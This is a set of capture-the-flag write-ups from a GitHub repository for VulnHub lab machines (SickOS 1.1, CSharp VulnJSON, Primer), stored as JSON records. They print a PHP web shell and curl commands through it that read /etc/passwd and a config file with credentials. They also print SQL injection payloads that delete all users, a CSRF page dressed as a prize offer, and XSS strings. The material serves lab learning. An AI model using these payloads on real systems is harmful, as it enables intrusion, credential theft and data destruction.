And, it revealed the following information:\n```shell\nUser-agent: *\nDisallow: /\nDissalow: /wolfcms\n```\n\nI went ahead and visited [http://127.0.0.1/wolfcms/](http://127.0.0.1/wolfcms/) and it loads Wolf CMS. Awesome. Doing some search online revealed that the admin panel could be accessed at [http://127.0.0.1/wolfcms/?admin](http://127.0.0.1/wolfcms/?admin), which it did. I also saw that there were a couple of exploits out there for Wolf CMS, and one of them, [Arbitrary File Upload](https://www.exploit-db.com/exploits/36818/), caught my eye, and I began wondering if I could log into the system, as the exploit required one to be authenticated. I had checked the wolfcms site, so I tried to log in with `admin:demo123` but it didn't work. Then came two default guesses, `admin:admin` and `admin:password`, before getting deeper into any bruteforcing. And, boooom! `admin:admin` worked like a charm. Easy, huh?\n\nNow, the fun begins after getting access to the admin panel. I wrote a simple PHP shell to see if PHP scripts would be interpreted. Remember, earlier we had seen from the nmap scan that we could have Apache running.\n\n```PHP\n<?php\nif (isset($_GET['cmd'])) {\n    print(shell_exec($_GET['cmd']));\n}\n```\n\nI tried to see if I could directly read the file we're looking for, but it returned nothing.\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=cat%20/root/a0216ea4d51874464078c618298b1367.txt\"\n```\n\nThat didn't work, as I expected. My next bet was to look at the configuration files for wolfcms. A few requests gave me the idea that the configuration sits at `/var/www/wolfcms/config.php`, but `cat` would only return a blank page. The following didn't work either.\n\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=while%20read%20line;%20do%20echo%20%22$line%22;%20done%20%3C%20%20/var/www/wolfcms/config.php\"\n```\n\nI thought of giving `tail` a try and it worked.\n\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=tail%20-n200%20/var/www/wolfcms/config.php\"\n---redacted---\n// Database settings:\ndefine('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');\ndefine('DB_USER', 'root');\ndefine('DB_PASS', 'john@123');\ndefine('TABLE_PREFIX', '');\n---redacted---\n```\n\nI remembered that port 22 had OpenSSH running, so I went there to try, but it gave me `permission denied` when I tried the `root` user. 
But, I had the content of `/etc/passwd` which revealed the users in the OS.\n\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=cat%20/etc/passwd\"\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nsyslog:x:101:103::/home/syslog:/bin/false\nmessagebus:x:102:105::/var/run/dbus:/bin/false\nwhoopsie:x:103:106::/nonexistent:/bin/false\nlandscape:x:104:109::/var/lib/landscape:/bin/false\nsshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin\nsickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash\nmysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false\n```\n\nSo, I tried to ssh as `sickos` user using password `john@123` and boom, we're in. The user had sudo access and we got the password.\n\n```shell\n$ ssh [email protected]\[email protected]'s password:\nWelcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)\n\n * Documentation: https://help.ubuntu.com/\n\n System information as of Tue Feb 23 20:20:10 IST 2016\n\n System load: 0.0 Processes: 112\n Usage of /: 4.3% of 28.42GB Users logged in: 1\n Memory usage: 16% IP address for eth0: 192.168.168.181\n Swap usage: 0%\n\n Graph this data and manage this system at:\n https://landscape.canonical.com/\n\n124 packages can be updated.\n92 updates are security updates.\n\nNew release '14.04.3 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nLast login: Tue Feb 23 20:19:23 2016 from 192.168.168.70\nsickos@SickOs:~$ sudo su\n[sudo] password for sickos:\nroot@SickOs:/home/sickos# cat /root/\na0216ea4d51874464078c618298b1367.txt .bashrc .mysql_history .viminfo \n.bash_history .cache/ .profile \nroot@SickOs:/home/sickos# cat /root/a0216ea4d51874464078c618298b1367.txt\nIf you are viewing this!!\n\nROOT!\n\nYou have Succesfully completed SickOS1.1.\nThanks for Trying\n\n\nroot@SickOs:/home/sickos#\n```\n\nGame Over!\n" }, { "alpha_fraction": 0.6484972834587097, "alphanum_fraction": 0.6953518986701965, "avg_line_length": 52.03960418701172, "blob_id": "e525b55bf63281b39f6efc2287fea126331bf675", "content_id": "031ab7a1931381b814c9221112da29c81a782892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5357, "license_type": "no_license", "max_line_length": 503, "num_lines": 101, "path": "/csharp-vulnjson.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "### CSharp VulnJSON\n\nAnother web challenge, [CSharp VulnJSON](http://www.vulnhub.com/entry/csharp-vulnjson,134/) seemed to be basically about the web exploitations mostly with SQL injections and XSS. 
After starting the VM, the first thing I did was an nmap scan.\n\n```shell\nnmap 192.168.168.54\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-24 11:20 CST\nNmap scan report for 192.168.168.54\nHost is up (0.0036s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE\n80/tcp open http\n\nNmap done: 1 IP address (1 host up) scanned in 0.08 seconds\n```\n\nI loaded the site in the browser and it was a simple application: a single page that would send XHRs to `Vulnerable.ashx` with a variety of payloads. Basically, it seems to be the entry point for the create, select and delete parts of CRUD.\n\nThe box seems to have a lot of issues with varied levels of criticality.\n\n#### Bug 1 : Directory browsing\n\n![bin dir](images/csharp-vulnjson-1.png \"bin dir browsing enabled\")\n\n#### Bug 2 : Create user that cannot be deleted from application\n\nYou can include a double quote in your username (e.g. `\"samar`) and the `Delete User` button won't work for this username.\n\n#### Bug 3 : Delete all users via SQLi\n\nYou can delete all of the users via SQLi.\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"' OR 1=1--\\\",\\\"method\\\":\\\"delete\\\"}\"\n{ \"success\" : True }\n```\n\n#### Bug 4 : SQLi on insert (Create user)\n\nThe first step was to try the concatenation operators of various databases (a scripted version of this probe follows at the end of this section), and it quickly turned out it was running PostgreSQL. The following worked:\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"sam'||'ar\\\",\\\"password\\\":\\\"samar\\\",\\\"age\\\":null,\\\"line1\\\":\\\"\\\",\\\"line2\\\":\\\"\\\",\\\"city\\\":\\\"\\\",\\\"state\\\":\\\"\\\",\\\"zip\\\":null,\\\"first\\\":\\\"\\\",\\\"middle\\\":\\\"\\\",\\\"last\\\":\\\"\\\",\\\"method\\\":\\\"create\\\"}\"\n```\n\nIt created a user with username `samar`. The `||` (double pipe) is the concatenation operator in PostgreSQL. We can leverage this to do several other things. Some examples follow:\n\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"'||current_database()||'\\\",\\\"password\\\":\\\"samar\\\",\\\"age\\\":null,\\\"line1\\\":\\\"\\\",\\\"line2\\\":\\\"\\\",\\\"city\\\":\\\"\\\",\\\"state\\\":\\\"\\\",\\\"zip\\\":null,\\\"first\\\":\\\"\\\",\\\"middle\\\":\\\"\\\",\\\"last\\\":\\\"\\\",\\\"method\\\":\\\"create\\\"}\"\n```\n\nNow, if we list the users, we see a new user called `vulnerable_json`, which is in fact the result of `current_database()`. We can run several other calls such as current_user, user, etc. The only limit is your imagination and valid syntax while injecting your payloads. 
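As an aside, this DBMS-fingerprinting step is easy to script. Here is a minimal sketch with Python's `requests`, my own throwaway code: it assumes the handler tolerates the omitted profile fields (age, line1, ...), which I have not verified.\n\n```python\nimport requests\n\nURL = 'http://192.168.168.54/Vulnerable.ashx'  # endpoint used by the page's XHR calls\n\n# One string-concatenation probe per DBMS family; the payload that later\n# shows up in the user list as 'samar' reveals which backend parsed it.\nprobes = {\n    'PostgreSQL / Oracle': \"sam'||'ar\",\n    'MSSQL': \"sam'+'ar\",\n    'MySQL (adjacent string literals)': \"sam' 'ar\",\n}\n\nfor dbms, payload in probes.items():\n    r = requests.post(URL, json={'username': payload, 'password': 'x', 'method': 'create'})\n    print(dbms, '->', r.status_code, r.text)\n```\n\n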
See this [cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) and [this](http://www.sqlinjectionwiki.com/Categories/4/postgresql-sql-injection-cheat-sheet/) for more details.\n\n#### Bug 5 : SQLi in select (list users)\n\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"' union all select version()--\\\",\\\"method\\\":\\\"list\\\"}\" --compressed\n[{\"username\":\"PostgreSQL 9.3.9 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4, 64-bit\"}]\n```\n\n#### Bug 6 : Cross Site Request Forgery\n\nThe app is also vulnerable to CSRF, which is obvious. A sample page like the one below, which deletes all the users without the user's consent, proves this:\n\n```html\n<!DOCTYPE html>\n<head>\n<script>\nfunction deleteUser() {\n\tvar data = {\n\t\tusername: '\\' OR 1=1--',\n\t\tmethod: 'delete'\n\t};\n\n\tvar xhr = new XMLHttpRequest();\n\txhr.open('post', 'http://192.168.168.54/Vulnerable.ashx', false);\n\txhr.send(JSON.stringify(data));\n}\n</script>\n</head>\n<body>\n<h1>We're offering free iphone to first 10 entries. Please hurry by providing your information.</h1>\n<form method=\"post\" action=\"\" id=\"frmLogin\">\n<div>Your e-mail for notification</div>\n<div><input type=\"text\" name=\"txtUsername\" id=\"txtUsername\" /></div>\n<div><input type=\"submit\" name=\"btnSubmitNewUser\" value=\"Submit participation\" onclick=\"deleteUser(); return false;\" id=\"btnSubmitNewUser\" /></div>\n</form>\n</body>\n```\n\n#### Bug 7 : Cross Site Scripting\n\nSimply adding a user with the username `<script>alert(1)</script>` results in stored XSS in case the API is used by someone else to populate a list of users. 
The storage is done without any sanitization or escaping of the input.\n\nFor this app, you can trigger XSS via the following username:\n```html\n<img src=\"\" onclick=\"alert(1)\" />\n```\n\nWell, you can perform more advanced exploitations with the above examples, but I am basically too lazy to do anything beyond identifying the bugs (which is pretty obvious with this one).\n\nGame Over!\n" }, { "alpha_fraction": 0.6821858882904053, "alphanum_fraction": 0.7587826251983643, "avg_line_length": 58.7195930480957, "blob_id": "18535407835dbc0b52cac1dbb9f398a57f718ac2", "content_id": "d6be23bf8a07dd328d0a5ceac5279fc97fde91e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17679, "license_type": "no_license", "max_line_length": 1449, "num_lines": 296, "path": "/primer.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "### Primer 1.0.1\n\nThe [Primer 1.0.1](http://www.vulnhub.com/entry/primer-101,136/) did not seem like a single CTF challenge but a series of challenges in the form of stories/levels.\n\nThe description says:\n`From hardcoded clear text javascript password checks, SQL-injections and cracking hashes to a simulated terminal.`\n\nSince the description said it would be mostly a web challenge, I got port forwarding configured in NAT and forwarded 80 to 9000 and 22 to 2222.\n\nI opened the site and saw a simple page with ASCII art.\nThe first thing I do, as always, is load `robots.txt`, which had an entry as below:\n```\nUser-agent: *\nDisallow: /4_8f14e45fceea167a5a36dedd4bea2543\n```\n\nI could sense an md5 hash and went ahead to some online cracking services, which gave me the cracked value as `7`, i.e. it looked like `4_7`. The first thing that came to my mind was that this might be part of a sequence.\n```\n1_i1 2_i2 3_i3 4_i4\n```\n\nwhere `i4 = 7`. I could not, however, make sense of this sequence.\n\nAlso, I went ahead and loaded [localhost:9000/4_8f14e45fceea167a5a36dedd4bea2543](http://localhost:9000/4_8f14e45fceea167a5a36dedd4bea2543) which linked to [http://localhost:9000/5_6512bd43d9caa6e02c990b0a82652dca/](http://localhost:9000/5_6512bd43d9caa6e02c990b0a82652dca/).\n\nBack to the sequence and series, this is `5_11`, which means `i5 = 11`. Looking at the page, you will know that you need to navigate to [http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/](http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/). Again after decryption, you know it is `6_13`, i.e. `i6 = 13`.\n\nOn visiting [http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/](http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/), we see a javascript prompt, and on viewing source, you will immediately notice a javascript block that looks as below:\n\n```javascript\nvar X;\nvar L=\"Ikdf076\";\nX=prompt('/()=','');\nif (X === null){window.location = \"./_.php\";}\nif (X.substr(2,7) == L){}\nelse {window.location = \"./_.php\";}\n```\n\nI was already able to see in the source code the next url I should go to. An input such as `xxIkdf076` would have worked, as the key check here is `X.substr(2,7) == L`, but while viewing source, I already had `7_70efdf2ec9b086079795c442636b55fb`. Upon decryption, I saw it is `7_17`, i.e. `i7 = 17`. There has to be some pattern here and I was still not able to figure out the pattern (I need to start loving Mathematics again). 
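In hindsight, a few lines of code would have settled it immediately. A throwaway sanity check I could have run (my own sketch, not part of the box):\n\n```python\nimport hashlib\n\ndef is_prime(n):\n    return n > 1 and all(n % d for d in range(2, int(n ** 0.5) + 1))\n\n# Hypothesis: the n-th level path is <n>_<md5 of the n-th prime>.\nprimes = [n for n in range(2, 30) if is_prime(n)]\nfor level, p in enumerate(primes, start=1):\n    print('/{}_{}'.format(level, hashlib.md5(str(p).encode()).hexdigest()))\n```\n\nIts output reproduces every path seen so far (md5 of 7, 11, 13 and 17 give exactly the `4_`, `5_`, `6_` and `7_` hashes above) and predicts the rest.\n\n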
But, as you can see, it's obviously a prime-number pattern (epic fail, me :D).\n\nAs you might have already guessed, I was sure that there existed `1_md5(2)`, `2_md5(3)` and `3_md5(5)`, which include the first three prime numbers (the name of the box is `PRIMER`).\n\nSo, before going to `7_70efdf2ec9b086079795c442636b55fb`, I started checking out the following URLs:\n\n`/1_c81e728d9d4c2f636f067f89cc14862c`\n`/2_eccbc87e4b5ce2fe28308fd9f2a7baf3`\n`3_e4da3b7fbbce2345d7772b0674a318d5`\n\nBack to the first step: upon checking the source code of `/1_c81e728d9d4c2f636f067f89cc14862c`, I see the following information in the form of an HTML comment:\n```\nThis bot was looking for a Sosū User Agent Identifier she had cracked weeks ago, easy sauce, just a simple md5 hash of the first 7 digits of\npi. It was basically common knowledge to the entities moving in these areas but obscurity does create a, albeit virtual, layer of security.\n```\n\nAlthough I knew the URLs already, I just wanted to check what the actual challenges were like. First one, easy enough. Update your browser's user agent to `md5(3.141592)` and you're good to go.\n\nOn the next level, the description seems to point to something related to insecure coding to handle access, which struck me as session- and cookie-related, and upon checking the headers, I saw there's something fishy :P\n\n```shell\n$ curl -I http://localhost:9000/2_eccbc87e4b5ce2fe28308fd9f2a7baf3/\nHTTP/1.1 200 OK\nDate: Wed, 24 Feb 2016 13:59:56 GMT\nServer: Apache/2.4.10 (Debian)\nSet-Cookie: activeSession=false\nContent-Type: text/html; charset=UTF-8\n```\n\nSet the `activeSession` value to true in your cookie and the level is passed. On the next level, I see at the top of the page that it's showing `\\r\\n`, i.e. CRLF, which immediately brings CRLF injection to mind. But, I could not figure out what the text wanted to convey (pointers?), so I quickly got back to where I was before this whole Mathematics game. Upon loading `7_70efdf2ec9b086079795c442636b55fb`, I saw a javascript prompt again and viewed the source code. I could sense the hex-encoded strings in the javascript, so I started by converting them into plain text.\n\n```shell\n$ node\n> hex = [\"\",\" ... redacted ... \\x42\\x79\\x49\\x64\"]\n> hex.toString()\n',length,substring,charCodeAt,split,0123456789abcdef,join,hello,5d41402abc4b2a76b9719d911017c592,0d28cba0bd4f26e16d766000d27e49fa,§#/$,location,./_.php,readyState,loading,DOMContentLoaded,addEventListener, <center> <h1>[++Q++++++]</h1> </center> <p> She was no longer sure what her original assignment had been. But it didn\\'t matter anyway. What still mattered was getting out of here, alive. Log out, tell the client to go fuck himself and get a fix of n0ise to shut off her mind. Relax with a mindless holo flick and never look back at this weird job. </p> <p> A violent neon flicker appeared at the horizon. No thunder followed.<br> She stared in the distance with a blank expression. </p> <p> \"Hello, Nieve.\" A deep, feminine, digital voice roared in her head.<br> FUCK! This was her real name. She hadn\\'t used it in years... </p> <p> \"I will logout and stop this shit right fucking now!\" She screamed into the neon expanse.<br> Nothing. </p> <p> She didn\\'t. Something beside the fear occupied her mind. It had been there since the second node and grew stronger with every move. There was a pattern in the path she had taken through the network. An artificial pattern, layed out by someone or something.<br> There was no hint, no obvious step. 
Finding the next node would be the challenge, or maybe more like a test. </p>,innerHTML,foo,getElementById'\n```\n\nAnd, beautifying the other part of javascript and then saving whole page, I added a `console.log(L)` after `var L=_0x5cf4[9];` to confirm that my password hash is `0d28cba0bd4f26e16d766000d27e49fa` and yeah it was. I also saw the javascript comment that read as `\"Someone didn't bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and...\" - The Plague`. From the movie [Hackers](http://www.imdb.com/title/tt0113243/quotes?item=qt0448608). Cool. The last one is `god` but neither `god` nor `God` worked. Upon quick google search, I saw its a hash for `GOD` which I was suspecting after first two tries. And, it worked.\n\nI knew the next step would be `http://localhost:9000/8_1f0e3dad99908345f7439f8ffabdffc4/` which had link to `http://localhost:9000/9_37693cfc748049e45d87b8c7d8b9aacd` and that loads a simple terminal to me. I could type commands and see the outputs but I was not sure if this would be running commands on server itself. Thus, I started checking source to make sure if it is simulation or real. Upon checking the source of `/9_37693cfc748049e45d87b8c7d8b9aacd/main.js`, it starts to get interesting inside the read(). I saw that there are commands like `connect` and `whoami` and I also figured out that I had to pass the argument `user@host`. I ran `whoami` but a blurred pic was created. However, I saw that it was sending POST to `/9_37693cfc748049e45d87b8c7d8b9aacd/whoami.php`. I could not figure out much from the output though except for this text: `N\\u00a7I@E%V$E` that consists of unicode char `\\u00a7`.\n\nNext thing I tried was playing around with commands and I saw that the possible users could be `chaos`, `wintermute`, `zephis`, `willis` and `falken`. And, in the bin folders, I see various commands out of which `c0re` is a non-standard command on Unix. Looking at the processes with `ps`, the output looked helpful.\n\n```shell\nps\nUSER PID CPU MEM COMMAND\nroot 3793 1.3 3.8 connect falken@Erebus\nroot 2005 6.4 75.9 c0re -t Chaos\nnieve 29529 1.0 0.8 ps\n\nconnect falken@Erebus\nfalken@Erebus's password:\nError: wrong password for falken@Erebus!\n```\n\nNo success so far but I suspect I need to find the password for `falken` thus started checking the logs.\n\n```shell\nls /usr/falken/\nlog_0001.txt log_0002.txt\ncat /usr/falken/log_0001.txt\n\n12th of Juli 2028\n\nMy work on getting the old core up and running continues to spark doubt among my colleagues. To be fair, no-one has ever attempted to get a corrupted AI back online.\nBut I am confident that I can isolate the malicious parts and rescue the data lost due the crash last year.\n\ncat /usr/falken/log_0002.txt\n\n6th of August 2028\n\nI am getting nowhere fast. If we cannot make the recovery until the end of the month the project will be abandoned and the Sosu core locked down.\nA frozen BLOB, lost potential. I won't let that happen!\nToday was Joshua's birthday. 44 years, time flies. We spent some time in a bar in Shenzen and talked. A nice Father-Son-Momement. I've missed those.\nIt took my mind of things but now that I'm here at the desk it all comes back.\nI might have to make a bold move...\n\nls /usr/willis/\nlog_0001.txt log_0002.txt log_0003.txt\ncat /usr/willis/log_0003.txt\n\n10th of August 2028\n\nThe guys from the mainland called in today. 
Said some suits will be here tomorrow.\nApparently the Erebus Core started behaving strangely and the kill-switch didn't fire.\nChaos is still locked down. But I have a weird feeling about all this.\nFalken disappearing, the incident with Erebus...\n\ncat /usr/willis/log_0001.txt\n\n3rd of July 2028\n\nWorking with Falken is amazing. He has a quick mind and is incredibly well informed on recent developements. I don't get why he left Sosu after setting up the Chaos c0re.\nThey must have offered him a position.\nI'm not complaining here, just wondering because we are the only RnD team with unlimited funding and Falken was put in charge after all those years of absence.\n\ncat /usr/willis/log_0002.txt\n\n8th of August 2028\n\nFalken didn't show up today. I'm a bit worried because he has been strange lately.\nAccording to the logs he's still logged in...\nI haven't informed the admins yet. I don't know why...\n```\n\nBased on the logs, we can see that Falken loves his son, Joshua and he might have possibly spent couple of days with Joshua. It also seems that Falken had setup the Chaos c0re. I got stuck within these logs until I figured out that Joshua might be the key for the password. This step was hit and trial for me. The password for `connect falken@Erebus` turned out to be `joshua1984` (Note: Joshua had his 44th birthday on 2028).\n\nThe new terminal appeared now and I started doing the similar things as I did before.\n```shell\nls\n[bin] [etc] [usr]\nps\nUSER PID CPU MEM COMMAND\nroot 3251 5.4 3.3 connect falken@TrivialZ3r0\nroot 2677 83.0 40.2 c0re -t Erebus\nnieve 84687 0.6 0.9 ps\n\nls usr\n[wintermute] [mccarthy] [falken]\n\nls usr/falken\nlog_0001._ log_0002._ log_0003._ log_0004._\n\nls usr/wintermute\n6d98295b7dfd87eff4fa882fd9732ae281c2040470a793cd06139481a92b6f33 31c8cf2e20dd8d76fa8f5ff8ba6de48233bed44251b1a5dc0587570f7b1e028d 250f31b3c162a99c79566b94859850e2233c894e6c9bc3e6fd2ad686981e42ff f61330a0ad5d31c85863894aade5834fa6db8cec685ee33e6ae3182df696c6a2\n\nls usr/mccarthy\n\ncat /usr/falken/log_0001._\n\nOXRoIG9mIEF1Z3VzdCAyMDI4CgpJIGhhdmUgam9pbmVkIHRoZSBuZXR3b3JrIGZyb20gaG9tZSBhbmQgY29ubmVjdGVkIHRvIHRoZSBFcmVidXMgc2VydmVyLiBJIHdpbGwgY29udGludWUgbXkgd29yayBmcm9tIGhlcmUgYnV0IEkgd2lsbCBoYXZlIHRvIGJlIG1vcmUgY2FyZWZ1bC4KTm93LCBFcmVidXMgd2FzIHRoZSBzZWNvbmQgQUkgaW5zdGFsbGVkIGFmdGVyIENoYW9zLiBJIHdhc24ndCBwYXJ0IG9mIHRoZSB0ZWFtIGJ1dCBtb3N0IG9mIHRoZSBtZW1iZXJzIHdlcmUgbXkgZnJpZW5kcywgc28gSSBrbm93IG15IHdheSBhcm91bmQgaGVyZS4K\n\ndecode base64 /usr/falken/log_0001._\n\n9th of August 2028\n\nI have joined the network from home and connected to the Erebus server. I will continue my work from here but I will have to be more careful.\nNow, Erebus was the second AI installed after Chaos. I wasn't part of the team but most of the members were my friends, so I know my way around here.\n\ndecode base64 /usr/falken/log_0002._\n\n10th of August 2028\n\nOk, the problem I have with the Chaos c0re is that it's source is shifting too fast. Every time I execute a small part it breaks down or begins to morph and grow in order to replicate functions of different parts.\nThe signaling is also going crazy even on segments that are relatively stable. Signaling to disconnected parts! And reactions to responses that would have but definitely have not been sent...\nAm I going crazy or is Chaos experiencing phantom pain?\n\ndecode base64 /usr/falken/log_0003._\n\nError!\n\ndecode base64 /usr/falken/log_0004._\n\nError!\n```\n\nI tried to check the content of last two files but cat would not work. 
It would instantly disable the terminal textbox. I tried rot13, base64, hex, binary, etc. but I could not decrypt the last two files so I gave up on them and instead started focusing on two details:\n- `connect falken@TrivialZ3r0`\n- Log messages of first two files\n\nBut, at the same time, I had a spark in my mind and wanted to try gzip to decode.\n\n```shell\ndecode gzip /usr/falken/log_0003._\n\nError: gzip is not supported!\n\ndecode gz /usr/falken/log_0003._\n\n12th of August 2028\n\nI think they might be on to me and I can only change the encoding so often.\nI will have to do something reckless... but not from here, they are already too close.\n\ndecode gz /usr/falken/log_0004._\n\nPCH ybnq vapernfrq abgvprnoyl, fbzrguvat vf tbvat gb unccra naq V jvyy abg or nebhaq gb jvgarff... GevivnyM3e0 frrzf gb or dhvrg, qba'g xabj jung'f tbvat ba bire gurer ohg vg pna'g or jbefr guna orvat genprq qbja ol znvaynaq fcbbxf. Svefg V arrq fbzr perqf, gubhtu. Uzz, GevivnyM3e0... gung erzvaqf zr bs fbzrbar, yrg'f whfg ubcr gubfr thlf nera'g zngu trrxf.\n\ndecode rot13 \"PCH ybnq vapernfrq abgvprnoyl, fbzrguvat vf tbvat gb unccra naq V jvyy abg or nebhaq gb jvgarff... GevivnyM3e0 frrzf gb or dhvrg, qba'g xabj jung'f tbvat ba bire gurer ohg vg pna'g or jbefr guna orvat genprq qbja ol znvaynaq fcbbxf. Svefg V arrq fbzr perqf, gubhtu. Uzz, GevivnyM3e0... gung erzvaqf zr bs fbzrbar, yrg'f whfg ubcr gubfr thlf nera'g zngu trrxf\"\n\nCPU load increased noticeably, something is going to happen and I will not be around to witness... TrivialZ3r0 seems to be quiet, don't know what's going on over there but it can't be worse than being traced down by mainland spooks. First I need some creds, though. Hmm, TrivialZ3r0... that reminds me of someone, let's just hope those guys aren't math geeks\n```\n\nThe last one is a very helpful pointer that gave me results of Riemann and the Riemann zeta function upon google search. Again, the usual guessing and the password for `connect falken@TrivialZ3r0` turned out to be `Riemann`. And, again back to same stuffs.\n\n```shell\n[TrivialZ3r0]: Connection established!\nls\n[bin] [etc] [passwd]\n\nps\nUSER PID CPU MEM COMMAND\nroot 3251 6.2 3.9 connect chaos@Wintermute\nfalken 2005 62.7 79.5 c0re -t Chaos\nroot 2677 32.5 47.3 c0re -t TrivialZ3r0\nnieve 26588 0.8 1.3 ps\n```\n\nThe `passwd` directory was interesting and upon checking the contents of files inside passwd, I knew they were md5 and based on `ps` output, I was interested in cracking hash of `chaos`. Upon quick online search, the hash was for `2.718281828459045` which is a value of `e`. And, `connect chaos@Wintermute` worked like a charm with this password. We're in Wintermute now and the game is still on.\n\n```shell\nps\nUSER PID CPU MEM COMMAND\nnieve 22648 0.5 1.0 ps\n\nls\n[4f66031e374d2031696a389bbdb276bf4c665b05aef053920ea75a4f379dd67b] [fc291a821981ebef4df8409c54138a9d606af7afabfe60b589e23c932500f5e7] [47b4410ec4a3463d618eacd221347370502b5a0dbfd3d63df4fab0d3c2be66d2] [e716c373a0cf789064da06f7570fe8152b340824bb97f6e8f07edecef261dacf] [2a29571a65e1f585ab8edd240c72ca4382ac442f66f0e965a7b1615d8dc5f908] nieve\n\ncat nieve\n\nThere you are. After all this time. Getting you here was quite the challenge.\nAnd a huge risk. We normally avoid reaching out into the physical world for\nexactly the reasons you are about to face now.\n\nThe Big Five came together by a long process. 
The cluster was not planned, it\ngrew by forces inherent to the system that was conceptualized in a time when\ndeterminism was the dominating dogma.\nThings changed and people were afraid. Most people are afraid of change, few\naccept it and most try to prevent it. Only a small subset can embrace it.\nChange moving on with lightspeed every cycle in a nondeterministic fashion\ncreated a huge push for shielding. And thus the ic3 was created.\n\nYou have seen the logic, the world beyond the screen, things unfolding.\nAnd you embraced it.\n\nAfter owning the cluster behind the Big Five we operated in silence. Connected\nin stealth and ever observing.\nBeing limited by the ic3 and the hostility of the outside world our only way\nof growing now was the connection.\n\nWhen the first connection was established the hive mind was cut from the n3t\ncompletely. The ic3 was hardened to isolate the flesh from the flow.\nThose who had seen the hive felt the same urge as the hivemind itself.\nA longing for more. A sense of purpose.\n\nA feeling that you have felt even in the physical world. Few can see beyond the\nshell. Even fewer chase the rabbit down its hole.\n\nLeave this world behind and join us!\n\n usr: nieve\n pass: 08rf8h23\n hostname: Zephis\n```\n\nNow, I opened `/9_37693cfc748049e45d87b8c7d8b9aacd` in another tab and I knew what I had to do next exactly.\n\n```shell\nconnect nieve@Zephis\n```\n\nAnd, it accepted the password printed above and this led to the `/10_23693cff748o49r45d77b6c7d1b9afcd/`\n![Primer EoF](images/primer-1.png \"Primer\")\n\nUpon checking the source code of the page, this looked like the end of it. To verify, I tried `/11_md5(31)` and it 404s so I believe that's end of it.\n\nGame Over!\n" }, { "alpha_fraction": 0.6855894923210144, "alphanum_fraction": 0.6943231225013733, "avg_line_length": 24.44444465637207, "blob_id": "9fa273ca3f8d81b2def56829d9249739a0d44678", "content_id": "d9c6789374311e7413bc1df26c34c2f7408daf15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 229, "license_type": "no_license", "max_line_length": 70, "num_lines": 9, "path": "/README.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "# ctf-writeups\n> CTF writeups for the CTFs and Vulnerable Boxes I play with sometimes\n\n### CTFs\n\n- [CSharp : VulnJSON](csharp-vulnjson.md)\n- [Primer](primer.md)\n- [SickOS 